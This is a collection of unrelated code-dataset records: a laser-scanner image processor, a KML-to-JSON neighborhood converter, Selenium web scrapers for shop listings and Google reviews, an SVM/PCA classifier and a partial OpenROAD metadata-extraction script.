###\n    op.drop_table('conference_space')\n    ### end Alembic commands ###\n","sub_path":"migrations/versions/1217a2e3ce7e_.py","file_name":"1217a2e3ce7e_.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"257142961","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nimport pseyepy\r\nimport math\r\n\r\n\r\nclass ProjectExistError(Exception):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.strerror = \"Such a project already exists.\"\r\n\r\n\r\nclass CameraConnectionError(Exception):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.strerror = \"The camera was not connected correctly.\"\r\n\r\n\r\nclass ImageProcessor:\r\n    def __init__(self, configuration, path=None, project_name=None):\r\n        \"\"\"\r\n        Initialize an ImageProcessor instance.\r\n        :param configuration: dictionary of settings parsed from a json file\r\n        :param path: path to the projects directory; if it does not exist, photos are not saved\r\n        :param project_name: name of the project and of the new project folder;\r\n        two projects with the same name cannot exist in the same directory\r\n        \"\"\"\r\n        try:\r\n            self._camera = pseyepy.Camera(resolution=pseyepy.Camera.RES_LARGE, colour=False)\r\n        except ValueError:\r\n            raise CameraConnectionError()\r\n\r\n        self.configuration = configuration\r\n        self._path = path\r\n        self._project_name = project_name\r\n        self.base_photo_name = 'img'\r\n        self.photo = None\r\n        if self._path:\r\n            self._prepare_folder()\r\n\r\n    def get_project_path(self):\r\n        \"\"\" Return the path to the project directory.\"\"\"\r\n        return os.path.join(self._path, self._project_name)\r\n\r\n    def _prepare_folder(self):\r\n        \"\"\" Create the project folder. \"\"\"\r\n        folder_path = self.get_project_path()\r\n        if not os.path.exists(folder_path):\r\n            os.makedirs(folder_path)\r\n        else:\r\n            raise ProjectExistError()\r\n\r\n    def _generate_file_name(self, angle):\r\n        \"\"\"\r\n        Generate the photo file name according to the rotation angle.\r\n        :param angle: rotation angle about the centre of the plate holding the object\r\n        \"\"\"\r\n        return self.base_photo_name + str(angle).replace('.', '_') + '.png'\r\n\r\n    def take_photo(self):\r\n        \"\"\"\r\n        Take a photo and store it in the photo attribute.\r\n        \"\"\"\r\n        self.photo, __ = self._camera.read()\r\n\r\n    def preprocess_photo(self):\r\n        \"\"\"\r\n        Preprocess the photo: apply thresholding and cut off points that certainly do not belong to the scan.\r\n        :return: a tuple (laser_positions, thresh)\r\n        laser_positions - a list of points in the camera plane (each stored as an np.array [x, y, z]),\r\n        where x, y are the laser points detected in the photo, shifted relative to the\r\n        optical centre of the camera.\r\n        thresh - the thresholded photo\r\n        \"\"\"\r\n        _, thresh = cv2.threshold(self.photo, self.configuration[\"THRESHOLD\"], 255, cv2.THRESH_BINARY)\r\n        thresh[:, :self.configuration[\"MIN_X\"] + self.configuration[\"OPTICAL_CENTER_X\"]] = 0\r\n        thresh[:, self.configuration[\"MAX_X\"] + self.configuration[\"OPTICAL_CENTER_X\"]:] = 0\r\n        laser_positions = self._count_laser_pos(thresh)\r\n        self.photo = cv2.cvtColor(self.photo, cv2.COLOR_GRAY2BGR)\r\n        laser_positions = laser_positions - np.array([\r\n            np.full(laser_positions.shape[0], self.configuration[\"OPTICAL_CENTER_X\"]),\r\n            np.full(laser_positions.shape[0], self.configuration[\"OPTICAL_CENTER_Y\"]),\r\n            np.full(laser_positions.shape[0], 0)\r\n        ]).T\r\n        return laser_positions, thresh\r\n\r\n    def postprocess_photo(self, laser_positions, on_scans):\r\n        \"\"\"\r\n        Draw the detected points onto the photo. 
Points that lie on the scan are drawn in green,\r\n        points that were not detected on it in red.\r\n        :param laser_positions: list of points in the camera plane, shifted relative to the optical centre of the camera.\r\n        :param on_scans: list of booleans, one for each laser point; True means the point lies on the scan.\r\n        \"\"\"\r\n        for position, on_scan in zip(laser_positions, on_scans):\r\n            pos = (int(round(position[0] - self.configuration[\"OPTICAL_CENTER_X\"])),\r\n                   int(round(position[1] - self.configuration[\"OPTICAL_CENTER_Y\"])))\r\n            if on_scan:\r\n                self.photo[pos[0]][pos[1]] = np.array([0, 255, 0])\r\n            else:\r\n                self.photo[pos[0]][pos[1]] = np.array([0, 0, 255])\r\n\r\n    def save_photo(self, angle):\r\n        \"\"\"\r\n        Save the photo in the project folder.\r\n        :param angle: rotation angle about the centre of the plate holding the object\r\n        :return: string with the path to the saved file, or None if no photo has been taken\r\n        \"\"\"\r\n        if self.photo is not None:\r\n            file_name = self._generate_file_name(angle)\r\n            photo_path = os.path.join(self._path, self._project_name, file_name)\r\n            cv2.imwrite(photo_path, self.photo)\r\n            return photo_path\r\n        return None\r\n\r\n    @staticmethod\r\n    def _find_longest_segment(lit_points_in_the_line):\r\n        \"\"\"\r\n        Find the longest lit segment in the given line.\r\n        :param lit_points_in_the_line: list of lit points (as x values)\r\n        :return: the longest segment as a tuple (last element of the segment, length of the segment)\r\n        \"\"\"\r\n        length_of_segment = 0\r\n        max_len = 0\r\n        last_x = None\r\n        max_segment = None\r\n\r\n        for x in lit_points_in_the_line:\r\n            if last_x and x != last_x + 1:\r\n                if length_of_segment > max_len:\r\n                    max_len = length_of_segment\r\n                    max_segment = (last_x, length_of_segment)\r\n                length_of_segment = 0\r\n            length_of_segment += 1\r\n            last_x = x\r\n        if length_of_segment > max_len:\r\n            max_segment = (last_x, length_of_segment)\r\n\r\n        return max_segment\r\n\r\n    @staticmethod\r\n    def _count_average(frame_line, range_of_points):\r\n        \"\"\"\r\n        Compute the weighted average of a segment, which gives the central point of the laser (x).\r\n        :param frame_line: one line of the image\r\n        :param range_of_points: segment range as a tuple (index of the first element, index of the last element + 1)\r\n        :return: the central point of the laser\r\n        \"\"\"\r\n        sum_u = 0\r\n        sum_d = 0\r\n        for i in range_of_points:\r\n            sum_u += frame_line[i] * i\r\n            sum_d += frame_line[i]\r\n        return sum_u / sum_d\r\n\r\n    def _count_laser_pos(self, thresh):  # return list of laser position, every position is a tuple (y, x)\r\n        \"\"\"\r\n        Compute the central laser point of every line of the thresholded image.\r\n        :param thresh: the thresholded photo\r\n        :return: list of laser points\r\n        \"\"\"\r\n        non_zeros = np.nonzero(thresh)\r\n        laser_pos = []\r\n\r\n        x_indices = []\r\n        last_y_index = -1\r\n        arr_len = non_zeros[1].shape[0]\r\n        for i in range(arr_len):\r\n            y = non_zeros[0][i]\r\n            x = non_zeros[1][i]\r\n            if last_y_index != y or arr_len == i:\r\n                if last_y_index != -1:\r\n                    longest_segment = self._find_longest_segment(x_indices)\r\n                    longest_segment_range = (longest_segment[0] - longest_segment[1] + 1, longest_segment[0] + 1)\r\n                    avg = self._count_average(self.photo[last_y_index], longest_segment_range)\r\n                    laser_pos.append((avg, last_y_index, 1))\r\n                x_indices = []\r\n                last_y_index = y\r\n            x_indices.append(x)\r\n        return np.array(laser_pos)\r\n\r\n    def close_camera(self):\r\n        \"\"\"Close the camera connection at the end of the project. 
\"\"\"\n self._camera.end()\n","sub_path":"Apka/python_files/image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"108699297","text":"#!/usr/bin/python\n\nimport boroughs\nimport json\nimport re\nimport shape_utils\nimport sys\nimport xml.etree.ElementTree as ET\n\ndef ReadKmlFile(path):\n neighborhood_to_coords = {}\n xmlstring = file(path).read()\n xmlstring = re.sub(r\" xmlns='[^']+'\", '', xmlstring, count=1)\n root = ET.fromstring(xmlstring)\n\n for node in root.findall('.//Placemark'):\n neighborhood = node.findtext('.//name')\n coords = node.findtext('.//coordinates')\n xyzs = [[float(x) for x in y.split(',')] for y in coords.strip().split(' ')]\n lon_lats = [(xyz[0], xyz[1]) for xyz in xyzs]\n center_lon, center_lat, _ = shape_utils.CenterOfMass(lon_lats)\n boro = boroughs.PointToBorough(center_lat, center_lon)\n # assert boro\n # Distinguish \"Chelsea, Manhattan\" from \"Chelsea, Staten Island\".\n if boro:\n neighborhood = '%s, %s' % (neighborhood, boro)\n neighborhood_to_coords[neighborhood] = lon_lats\n\n return neighborhood_to_coords\n\n\nokc = ReadKmlFile('nyc-neighborhoods.xml')\ncustom = ReadKmlFile('extra-neighborhoods.kml')\n\ndel okc[\"Randall's Island, Manhattan\"]\ndel okc[\"Roosevelt Island, Manhattan\"]\n\noverlap = set(okc.keys()).intersection(set(custom.keys()))\nassert len(overlap) == 0, ', '.join(overlap)\n\nneighborhood_to_coords = {}\nneighborhood_to_coords.update(okc)\nneighborhood_to_coords.update(custom)\n\nsys.stderr.write(\n 'Loaded %d neighborhood polygons.\\n' % len(neighborhood_to_coords))\n\njson.dump(neighborhood_to_coords, file('neighborhood-polygons.json', 'w'))\n\n","sub_path":"nyc/create-neighborhood-json.py","file_name":"create-neighborhood-json.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255222138","text":"from __selector import __ ,_post\nimport json\n\n\n\n\n\ndef home():\n\turl='https://myshopprime.com/abhijit.murmu/shop/all'\n\ta=__(url,'.tile-container > .nocta') \n\tmainObj = {}\n\tfor i in a:\n\t\tlis = __('','.t-box',i)\n\t\tfor ass in lis:\n\t\t\timg = __('','.img-responsive',ass)\n\t\t\tshort = __('','.t-info p',ass)\n\t\t\tlink = __('','.t-info > a',ass)\n\t\t\tdp = __('','.discounted-price',ass)\n\t\t\tprint(img,short,link,dp)\n\t\t\tprint('\\n\\n')\n\t\t\tif len(img) == 1 and len(short) == 1:\n\t\t\t\timageLink = img[0]['src']\n\t\t\t\tshortText = short[0].text\n\t\t\t\tarticleHash = hash(img[0]['src'])\n\t\t\t\tlinkText = link[0]['href'] \n\t\t\t\tprice= dp[0].text\n\t\t\t\tmainObj[articleHash] = {\n\t\t\t\t\t\"imageLink\":imageLink,\n\t\t\t\t\t\"shortText\":shortText,\n\t\t\t\t\t\"linkText\":linkText,\n\t\t\t\t\t\"price\":price\n\t\t\t\t}\n\t\t\t\t \n\t\t\t\tprint('\\n')\n\t# print(mainObj)\n\n\tf=open('output/output-data.json', \"w+\")\n\tf.write(json.dumps(mainObj))\n\tf.close() \nhome()\n\n\n\t\nprint('finish')\n","sub_path":"myshopprime.py","file_name":"myshopprime.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"599934448","text":"import ast, json, string, operator, re, os, time, pickle, requests\nimport argparse as ap\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nfrom scrape_comments import read_user\nfrom pathlib import Path\nfrom selenium import 
webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport numpy as np\n\n\nCLICK_PAUSE_TIME = .5\n\ndef scrape_googlereviews_data(search_query, max_count):\n max_count = max_count * 2\n\n #Open browser in incognito\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(\"http://www.google.com\")\n\n #First google search\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n search_string = \"Google Reviews \" + search_query.replace(\"-\",\" \")\n elem.send_keys(search_string)\n elem.send_keys(Keys.RETURN)\n\n #Click on reviews\n reviewbutton = driver.find_element_by_xpath(\"//span[@jsl='$t t-h6pVaOIWfNg;$x 0;']\")\n reviewbutton.get_attribute('data-ved')\n reviewbutton.click()\n time.sleep(CLICK_PAUSE_TIME*6)\n\n #Scroll down review window to load all reviews\n # Finding a focusable element so that we can scroll\n try:\n focusable = driver.find_element_by_xpath(\"//button[@jsaction='r.GnCZFN8m9d0']\")\n except:\n print(\"Too Fast\")\n time.sleep(CLICK_PAUSE_TIME*8)\n focusable = driver.find_element_by_xpath(\"//button[@jsaction='r.GnCZFN8m9d0']\")\n\n scrolls = int(np.ceil(max_count/10)+1)\n for i in range(0,scrolls): #Collects the first 200 (10 per loop)\n focusable.send_keys(Keys.END)\n time.sleep(CLICK_PAUSE_TIME)\n\n #Expand all of the reviews\n #Note that the last several reviews may not be expanded\n #Because expanding the reviews actually loads a few more reviews \n expand_buttons = driver.find_elements_by_xpath(\"//a[@class='fl review-more-link']\")\n for button in expand_buttons:\n try:\n button.click()\n except:\n print(\"button already printed?\")\n\n #Extract all review elements\n reviews = driver.find_elements_by_xpath(\"//span[@jsl='$t t-uvHqeLvCkgA;$x 0;']\")\n\n #Extract text from reviews\n output = []\n for review in reviews:\n if(review.text != ''):\n output.append(review.text)\n\n #Close the driver\n driver.close()\n\n #Return our texts\n print(len(output)) \n return output\n\ndef scrape_google_description(search_query):\n #Open browser in incognito\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(\"http://www.google.com\")\n\n #First google search\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n search_string = search_query.replace(\"-\",\" \")\n elem.send_keys(search_string)\n elem.send_keys(Keys.RETURN)\n\n try:\n description_span = driver.find_element_by_xpath(\"//span[@class='Yy0acb']\")\n print(description_span)\n description = description_span.text\n print(description)\n except: \n description = ''\n\n #Close the driver\n driver.close()\n\n #Return our texts\n return description\n\ndef scrape_google_hours_spent(search_query):\n #Open browser in incognito\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n # chrome_options.add_argument('--headless')\n # chrome_options.add_argument('--no-sandbox')\n # chrome_options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=chrome_options)\n driver.get(\"http://www.google.com\")\n\n #First google search\n elem = driver.find_element_by_name(\"q\")\n 
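# Clear any text already present in the search box before typing the query\n    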
elem.clear()\n search_string = search_query.replace(\"-\",\" \")\n elem.send_keys(search_string)\n elem.send_keys(Keys.RETURN)\n\n hours_div = driver.find_element_by_xpath(\"//div[@class='UYKlhc']\")\n print(hours_div)\n hours = hours_div.find_element_by_xpath(\".//b\").text\n print(hours)\n\n #Close the driver\n driver.close()\n\n #Return our texts\n return hours\n\nif __name__ == '__main__':\n scrape_google_description('Girl and the Goat Chicago')\n # parser = ap.ArgumentParser()\n # parser.add_argument('-s', '--search_query', help='Search Query', default='girl-and-the-goat-chicago')\n # parser.add_argument('-n', '--n', help='Max Count', default='200')\n\n # args = vars(parser.parse_args())\n # search_query = args['search_query']\n # n = int(args['n'])\n # scrape_googlereviews_data(search_query, n)\n ","sub_path":"scrape_reviews_googlereviews.py","file_name":"scrape_reviews_googlereviews.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207525377","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nMulti-Class SVM while using PCA to reduce dimensionality\r\n\"\"\"\r\n\r\n# Imports\r\nimport numpy as np\r\nimport scipy.io as sio\r\nfrom sklearn import decomposition\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import preprocessing\r\nfrom sklearn.pipeline import FeatureUnion\r\nfrom sklearn import cross_validation\r\nfrom sklearn.feature_selection import SelectKBest, f_classif, SelectPercentile\r\nfrom evolutionary_search import EvolutionaryAlgorithmSearchCV\r\n# Import the data\r\ntrainData = sio.loadmat('Train.mat')\r\ntestData = sio.loadmat('Test.mat')\r\n\r\n# Get the values of the train data\r\nXtrain = trainData.get('Xtrain')\r\nYtrain = trainData.get('Ytrain')\r\neventsTrain = trainData.get('eventsTrain')\r\nsubjectsTrain = trainData.get('subjectsTrain')\r\nx = trainData.get('x')\r\ny = trainData.get('y')\r\nz = trainData.get('z')\r\n\r\n# Get the values of the test data\r\n# Get the test data into a numpy array\r\ntestX = testData.get('Xtest')\r\neventsTest = testData.get('eventsTest')\r\nsubjectsTest = testData.get('subjectsTest')\r\ntestX = np.array( testX, np.float32)\r\n\r\n# Set up the classifier\r\n# Use PCA to reduce the dimensionality\r\ncomp = 453 # number of components\r\ncw = {}\r\ncw[1] = 1\r\ncw[0] = 1\r\ncw[3] = 1\r\npca = decomposition.PCA(n_components=comp)\r\n\r\nselection = SelectKBest(k=180)\r\nclass_stuff = SelectPercentile(f_classif, percentile = 4)\r\ncombined_features = FeatureUnion([(\"pca\", pca), (\"univ_select\", selection),(\"class_stuff\",class_stuff)])\r\n\r\n#X_features = combined_features.fit(Xtrain, Ytrain).transform(Xtrain)\r\n\r\n# Set up the classifier\r\nclf = SVC(C = 10, cache_size=200, coef0=0.0, gamma = 0.0001,\r\n degree=3, kernel='rbf', max_iter=-1, class_weight = cw,\r\n probability=True,random_state=None, shrinking=True, \r\n tol=0.0001, verbose=False)\r\n\r\nXtrain = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(Xtrain)\r\n#pca.fit(Xtrain)\r\nX_pca = combined_features.fit(Xtrain, np.ravel(Ytrain)).transform(Xtrain)\r\n#X_pca = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(X_pca)\r\nclf.fit( X_pca, np.ravel(Ytrain))\r\n\r\n\r\n# Run cross validation\r\nscores = cross_validation.cross_val_score(clf, X_pca, np.ravel(Ytrain), cv=10)\r\nprint(scores.mean())\r\n\r\n\r\n# Run the values on the test set\r\ntestX = testData.get('Xtest')\r\ntestY = []\r\ntestY = np.array(testY, 
np.float32)\r\nprob = []\r\nprob = np.array(prob, np.float32)\r\n\r\n# Use PCA on the test set\r\ntestX = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(testX)\r\ntestNew = combined_features.transform(testX)\r\n#testNew = preprocessing.StandardScaler(copy=True, with_mean=True, with_std=True).fit_transform(testNew)\r\n# Get the class prediction\r\ntestY = clf.predict( testNew )\r\n# Get the probabilities\r\nprob = clf.predict_proba( testNew )\r\n\r\n# convert to labels\r\n\r\nnew = np.zeros((1001,3))\r\n\r\nfor i in range(0, 1001):\r\n    if( prob[i,0] == max(prob[i,:])):\r\n        new[i,:] = [1.0000, 0.0000, 0.0000]\r\n    elif( prob[i,1] == max(prob[i,:])):\r\n        new[i,:] = [0.0000, 1.0000, 0.0000]\r\n    else:\r\n        new[i,:] = [0.0000, 0.0000, 1.0000]\r\n\r\n\r\n# Put into a csv file\r\nnp.savetxt('prediction.csv', new, delimiter=\",\")","sub_path":"Project - Visual Object Recognition/autoscikit.py","file_name":"autoscikit.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"513577555","text":"#!/usr/bin/env python2\n\n# This script attempts to extract relevant data from a completed flow design\n# and save it into a \"metadata.json\". It achieves this by looking for specific\n# information in specific files using regular expressions\n#-------------------------------------------------------------------------------\n\nimport argparse  # argument parsing\nimport json  # json parsing\nimport subprocess\nimport sys\nimport re\nimport os  # filesystem manipulation\nimport datetime\nimport uuid\nimport platform\nfrom collections import OrderedDict\n\n\n# Parse and validate arguments\n# ==============================================================================\nparser = argparse.ArgumentParser(\n    description='Generates metadata from OpenROAD flow')\nparser.add_argument('--flowPath', '-f', required=True,\n                    help='Path to the flow directory')\nparser.add_argument('--design', '-d', required=True,\n                    help='Name of the design')\nparser.add_argument('--platform', '-p', required=True,\n                    help='Name of the platform')\nparser.add_argument('--comment', '-c', required=False, default=\"\",\n                    help='Additional comments to embed')\nparser.add_argument('--output', '-o', required=False, default=\"metadata.json\",\n                    help='Output file')\nargs = parser.parse_args()\n\nif not os.path.isdir(args.flowPath):\n    print(\"Error: flowPath does not exist\")\n    print(\"Path: \" + args.flowPath)\n    sys.exit(1)\n\nlogPath = os.path.join(args.flowPath, \"logs\", args.platform, args.design)\nrptPath = os.path.join(args.flowPath, \"reports\", args.platform, args.design)\n\n# Functions\n# ==============================================================================\n# Main function to do specific extraction of patterns from a file\n\n# This function will look for a regular expression \"pattern\" in a \"file\", and\n# set the key, \"jsonTag\", to the value found. The specific \"occurrence\" selects\n# which occurrence it uses. If pattern not found, it will print an error and set\n# the value to N/A. 
If a \"defaultNotFound\" is set, it will use that instead.\n# If occurrence is set to -2, it will return the count of the pattern.\n# t indicates the type that should be written to the JSON file (default: string)\ndef extractTagFromFile(jsonTag, pattern, file, occurrence=-1, defaultNotFound=\"N/A\", t=str):\n if jsonTag in jsonFile:\n print(\"[WARN] Overwriting Tag\", jsonTag)\n\n # Open file\n try:\n searchFilePath = os.path.join(args.flowPath, file)\n with open(searchFilePath) as f:\n content = f.read()\n\n m = re.findall(pattern, content, re.M)\n\n if m:\n if occurrence == -2:\n # Return the count\n jsonFile[jsonTag] = len(m)\n else:\n # Note: This gets the specified occurrence\n jsonFile[jsonTag] = (t)(m[occurrence].strip())\n else:\n # Only print a warning if the defaultNotFound is not set\n if defaultNotFound == \"N/A\":\n print(\"[WARN] Tag\", jsonTag, \"not found in\", searchFilePath)\n jsonFile[jsonTag] = defaultNotFound\n except IOError:\n print(\"[WARN] Failed to open file:\", searchFilePath)\n jsonFile[jsonTag] = \"ERR\"\n\n\ndef extractGnuTime(prefix, file):\n extractTagFromFile(prefix + \"__runtime__total\",\n \"^(\\S+)elapsed \\S+CPU \\S+memKB\",\n file)\n extractTagFromFile(prefix + \"__cpu__total\",\n \"^\\S+elapsed (\\S+)CPU \\S+memKB\",\n file)\n extractTagFromFile(prefix + \"__mem__peak\",\n \"^\\S+elapsed \\S+CPU (\\S+)memKB\",\n file, t=int)\n\n\n# Main\n# ==============================================================================\n\nnow = datetime.datetime.now()\njsonFile = OrderedDict()\n\njsonFile[\"run__flow__generate_date\"] = now.strftime(\"%Y-%m-%d %H:%M\")\ncmdOutput = subprocess.check_output(['openroad', '-version'])\ncmdFields = cmdOutput.split()\njsonFile[\"run__flow__openroad_version\"] = cmdFields[0]\nif (len(cmdFields) > 1):\n jsonFile[\"run__flow__openroad_commit\"] = cmdFields[1]\nelse:\n jsonFile[\"run__flow__openroad_commit\"] = \"N/A\"\njsonFile[\"run__flow__uuid\"] = str(uuid.uuid4())\njsonFile[\"run__flow__design\"] = args.design\njsonFile[\"run__flow__platform\"] = args.platform\njsonFile[\"comment\"] = args.comment\njsonFile[\"run__flow__hostname\"] = platform.node()\njsonFile[\"comment\"] = args.comment\n\n\n# Synthesis\n# ==============================================================================\n\n# yosys\nextractTagFromFile(\"run__synth__yosys_version\",\n \"^Yosys (.*)\",\n logPath+\"/1_1_yosys.log\")\nextractTagFromFile(\"synth__inst__num__total\",\n \"Number of cells: +(\\S+)\",\n rptPath+\"/synth_stat.txt\", t=int)\nextractTagFromFile(\"synth__inst__stdcell__area__total\",\n \"Chip area for module.*: +(\\S+)\",\n rptPath+\"/synth_stat.txt\", t=float)\nextractTagFromFile(\"run__synth__yosys_runtime__total\",\n \"CPU: user (\\S+)\",\n logPath+\"/1_1_yosys.log\")\nextractTagFromFile(\"run__synth__yosys_mem\",\n \"CPU: user.*MEM: (\\S+ \\S+)\",\n logPath+\"/1_1_yosys.log\")\nextractTagFromFile(\"run__synth__yosys_warnings\",\n \"Warnings: \\d+ unique messages, (\\d+) total\",\n logPath+\"/1_1_yosys.log\", t=int)\n\nextractGnuTime(\"run__synth\",logPath+\"/1_1_yosys.log\")\n\n# Floorplan\n# ==============================================================================\nextractTagFromFile(\"floorplan__slack__average__totneg\",\n \"^tns (\\S+)\",\n rptPath+\"/2_init.rpt\", t=float)\nextractTagFromFile(\"floorplan__slack__average__worst\",\n \"^wns (\\S+)\",\n rptPath+\"/2_init.rpt\", t=float)\nextractTagFromFile(\"floorplan__std__area__total\",\n \"^Design area (\\S+) u\\^2\",\n rptPath+\"/2_init.rpt\", 
t=int)\nextractTagFromFile(\"floorplan__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/2_init.rpt\")\nextractTagFromFile(\"run__floorplan__warnings\",\n \"(?i)warning\",\n logPath+\"/2_1_floorplan.log\", -2, 0)\nextractGnuTime(\"floorplan\",logPath+\"/2_1_floorplan.log\")\n\nextractTagFromFile(\"floorplan__io__count__total\",\n \"Num of I/O +(\\d+)\",\n logPath+\"/2_2_floorplan_io.log\", t=int)\nextractGnuTime(\"run__floorplan_io\",logPath+\"/2_2_floorplan_io.log\")\n\n\nextractGnuTime(\"run__floorplan_tdms\",logPath+\"/2_3_tdms_place.log\")\n\n\nextractTagFromFile(\"macroplace__inst__macro__count__total\",\n \"Extracted # Macros: (\\S+)\",\n logPath+\"/2_4_mplace.log\", -1, 0, t=int)\nextractTagFromFile(\"macroplace__solutions\",\n \"Total Extracted Solution: (\\S+)\",\n logPath+\"/2_4_mplace.log\", -1, 0, t=int)\nextractGnuTime(\"run__mplace\",logPath+\"/2_4_mplace.log\")\n\nextractGnuTime(\"run__tapcell\",logPath+\"/2_5_tapcell.log\")\n\nextractGnuTime(\"run__pdn\",logPath+\"/2_6_pdn.log\")\n\n\n# Place\n# ==============================================================================\n\n# global place\nextractTagFromFile(\"globalplace__wirelength__est\",\n \"^HP wire length: (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractTagFromFile(\"globalplace__slack__average__worst\",\n \"^Worst slack: (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractTagFromFile(\"globalplace__slack__average__totneg\",\n \"^Total negative slack: (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractTagFromFile(\"globalplace__util\",\n \"Util\\(%\\) = (\\S+)\",\n logPath+\"/3_1_place_gp.log\")\nextractGnuTime(\"run__globalplace\",logPath+\"/3_1_place_gp.log\")\n\n\n# Resizer\nextractTagFromFile(\"resizer__pre__slack__average__totneg\",\n \"^tns (\\S+)\",\n rptPath+\"/3_pre_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__pre__slack__average_worst\",\n \"^wns (\\S+)\",\n rptPath+\"/3_pre_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__pre__core__area__area\",\n \"^Design area (\\S+ \\S+)\",\n rptPath+\"/3_pre_resize.rpt\")\nextractTagFromFile(\"resizer__pre__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/3_pre_resize.rpt\")\nextractTagFromFile(\"resizer__ibuf_count\",\n \"Inserted (\\d+) input buffers\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__obuf_count\",\n \"Inserted (\\d+) output buffers\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__resize_count\",\n \"Resized (\\d+) instances\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__hbuf_count\",\n \"Inserted (\\d+) hold buffers\",\n logPath+\"/3_2_resizer.log\", t=int)\nextractTagFromFile(\"resizer__maxcap_viols\",\n \"Found (\\d+) max capacitance violations\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\nextractTagFromFile(\"resizer__maxslew_viols\",\n \"Found (\\d+) max slew violations\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\nextractTagFromFile(\"resizer__maxfanout_viols\",\n \"Found (\\d+) max fanout violations\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\nextractTagFromFile(\"resizer__maxfanout_bufs\",\n \"Inserted (\\d+) buffers\",\n logPath+\"/3_2_resizer.log\", -1, 0, t=int)\n#TODO Tie hi tie low\n# extractTagFromFile(\"resizer_maxfanout_bufs_tielo\",\n# \"Inserted (\\d+) tie \\S+ instances for \\d+ nets\",\n# logPath+\"/3_2_resizer.log\", 0, \"0\")\n# extractTagFromFile(\"resizer_maxfanout_bufs_tielo\",\n# \"Inserted (\\d+) tie \\S+ instances for \\d+ nets\",\n# logPath+\"/3_2_resizer.log\", 1, 
\"0\")\nextractTagFromFile(\"resizer__post__slack__average__totneg\",\n \"^tns (\\S+)\",\n rptPath+\"/3_post_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__post__slack__average__worst\",\n \"^wns (\\S+)\",\n rptPath+\"/3_post_resize.rpt\", t=float)\nextractTagFromFile(\"resizer__post__core__area__total\",\n \"^Design area (\\S+ \\S+)\",\n rptPath+\"/3_post_resize.rpt\")\nextractTagFromFile(\"resizer__post__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/3_post_resize.rpt\")\nextractGnuTime(\"run__resizer\",logPath+\"/3_2_resizer.log\")\n\n\n# Detail place\nextractTagFromFile(\"detailedplace__inst__core__area__total\",\n \"design area +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__inst__num__total\",\n \"total instances +(\\d+)\",\n logPath+\"/3_3_opendp.log\", t=int)\nextractTagFromFile(\"detailedplace__util\",\n \"utilization +(\\d+)\",\n logPath+\"/3_3_opendp.log\", t=int)\nextractTagFromFile(\"detailedplace__total_displacement\",\n \"total displacement +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__average_displacement\",\n \"average displacement +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__max_displacement\",\n \"max displacement +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__wirelength__est__original\",\n \"original HPWL +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__wirelength__est__legalized\",\n \"legalized HPWL +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", t=float)\nextractTagFromFile(\"detailedplace__wirelength__est__delta\",\n \"delta HPWL +(\\d*\\.?\\d*)\",\n logPath+\"/3_3_opendp.log\", 